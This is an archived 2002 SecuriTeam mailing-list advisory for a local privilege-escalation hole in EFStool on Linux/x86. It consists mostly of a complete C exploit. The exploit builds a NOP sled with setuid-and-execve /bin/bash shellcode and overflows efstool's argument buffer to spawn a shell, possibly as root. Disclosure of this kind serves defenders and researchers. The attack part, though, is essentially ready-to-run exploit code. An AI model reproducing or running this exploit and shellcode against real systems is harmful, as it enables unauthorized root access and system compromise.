[EXPL] EFStool Local Root Exploit for Linux/x86

From: support@securiteam.com
Date: 09/12/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 12 Sep 2002 08:24:05 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  EFStool Local Root Exploit for Linux/x86
------------------------------------------------------------------------

SUMMARY

EFStool has been found to contain a security vulnerability that allows
local attackers to cause it to execute arbitrary code. The vulnerability
can be tested for by using the following exploit code. Note that EFStool
is not setuid by default on the major Linux flavors.

DETAILS

Exploit:
/* efstool.c - efstool/bof simple overflow in efstool,
 *
 *
 * This code is published propterty of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if neccesary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 *
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"

//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------

char shellcode[]=
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/bash";

int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;

offset = atoi(argv[1]);
retaddr = get_esp() + offset;

for(i=0; i < SIZE; i+=4)
 *(long *)&buffer[i] = retaddr;

for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;

memcpy(buffer+i, shellcode, strlen(shellcode));
execl(PATH, "efstool", buffer, 12);
return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:cloudass@kernel.net>
Cloudass.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] Foxmail FROM Field Buffer Overflow
    ... Get your security news from a reliable source. ... unsigned char winexec[] = ... int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char ...
    (Securiteam)
  • [UNIX] GazTek HTTP Daemon Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Ghttpd is a fast and efficient HTTP ... char logfilename; ... int main; ...
    (Securiteam)
  • [UNIX] DDate Proof Of Concept Exploit and Bug details
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... on Slackware 8.0 a size bigger than 420 will overwrite the EIP, ... ./dxploit RET-Selection Offset (default 0)\n'); ... int bsize = buffer_size; ...
    (Securiteam)
  • [UNIX] Berkeley pmake Security Vulnerability
    ... Berkeley pmake Security Vulnerability ... There is a format string bug in the Berkeley's pmake 2.1.33 and below ... If the user puts a shell definition into the Makefile, ... static char eb; ...
    (Securiteam)
  • [EXPL] Remote Exploitable Heap Overflow in Null HTTPd
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... int sock; ... +int printht(const char *format, ...) ...
    (Securiteam)